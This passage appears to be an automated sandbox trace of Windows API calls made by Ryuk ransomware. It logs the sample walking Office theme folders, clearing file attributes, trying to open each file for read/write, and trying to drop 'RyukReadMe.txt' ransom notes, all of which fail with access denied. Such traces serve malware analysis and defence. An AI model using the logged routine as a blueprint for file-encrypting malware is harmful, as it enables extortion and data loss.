dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.136] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.136] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.136] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.136] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.136] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 0 [0133.136] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.136] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.136] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.136] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.137] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.137] SetLastError (dwErrCode=0x0) [0133.137] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.137] GetLastError () returned 0x5 [0133.137] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.137] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.137] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.137] SetLastError (dwErrCode=0x0) [0133.137] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.137] GetLastError () returned 0x5 [0133.137] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.137] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.137] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.138] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.138] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.138] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.138] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\CASCADE.ELM", dwFileAttributes=0x80) returned 0 [0133.138] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\CASCADE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\cascade.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.138] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.139] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.139] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.139] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.139] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\CASCADE.INF", dwFileAttributes=0x80) returned 0 [0133.139] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\CASCADE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\cascade.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.139] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.139] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.139] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.139] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.139] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF", dwFileAttributes=0x80) returned 0 [0133.139] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.140] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.140] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.140] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.140] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.140] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 0 [0133.140] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.140] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.140] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.140] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.140] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.141] SetLastError (dwErrCode=0x0) [0133.141] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.141] GetLastError () returned 0x5 [0133.141] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.141] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.141] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.141] SetLastError (dwErrCode=0x0) [0133.141] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.141] GetLastError () returned 0x5 [0133.141] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.141] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.141] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.142] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.142] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.142] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.142] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\COMPASS.ELM", dwFileAttributes=0x80) returned 0 [0133.143] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\COMPASS.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\compass.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.143] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.143] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.143] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.143] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.143] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\COMPASS.INF", dwFileAttributes=0x80) returned 0 [0133.143] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\COMPASS.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\compass.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.143] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.143] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.143] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.144] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.144] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF", dwFileAttributes=0x80) returned 0 [0133.144] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.144] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.144] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.144] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.144] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.144] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 0 [0133.144] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.144] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.144] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.145] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.145] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.145] SetLastError (dwErrCode=0x0) [0133.145] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.145] GetLastError () returned 0x5 [0133.145] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.145] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.145] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.145] SetLastError (dwErrCode=0x0) [0133.145] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.145] GetLastError () returned 0x5 [0133.145] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.145] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.145] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.145] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.146] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.146] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.146] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\CONCRETE.ELM", dwFileAttributes=0x80) returned 0 [0133.146] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\CONCRETE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\concrete.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.146] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.146] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.147] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.147] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.147] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\CONCRETE.INF", dwFileAttributes=0x80) returned 0 [0133.147] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\CONCRETE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\concrete.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.147] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.147] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.148] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.148] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.148] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF", dwFileAttributes=0x80) returned 0 [0133.148] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.148] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.148] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.148] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.148] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.148] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 0 [0133.148] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.149] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.149] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.149] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.149] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.149] SetLastError (dwErrCode=0x0) [0133.149] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.149] GetLastError () returned 0x5 [0133.149] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.149] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.149] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.149] SetLastError (dwErrCode=0x0) [0133.149] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.149] GetLastError () returned 0x5 [0133.149] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.149] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.149] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.149] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.150] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.150] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.150] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.ELM", dwFileAttributes=0x80) returned 0 [0133.150] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\deepblue.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.150] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.150] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.151] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.151] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.151] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.INF", dwFileAttributes=0x80) returned 0 [0133.151] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\deepblue.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.151] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.151] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.151] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.151] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.151] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF", dwFileAttributes=0x80) returned 0 [0133.151] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.152] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.152] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.152] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.152] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.152] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 0 [0133.155] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.155] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.155] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.155] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.155] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.155] SetLastError (dwErrCode=0x0) [0133.155] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.155] GetLastError () returned 0x5 [0133.155] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.155] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.155] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.155] SetLastError (dwErrCode=0x0) [0133.155] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.155] GetLastError () returned 0x5 [0133.155] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) 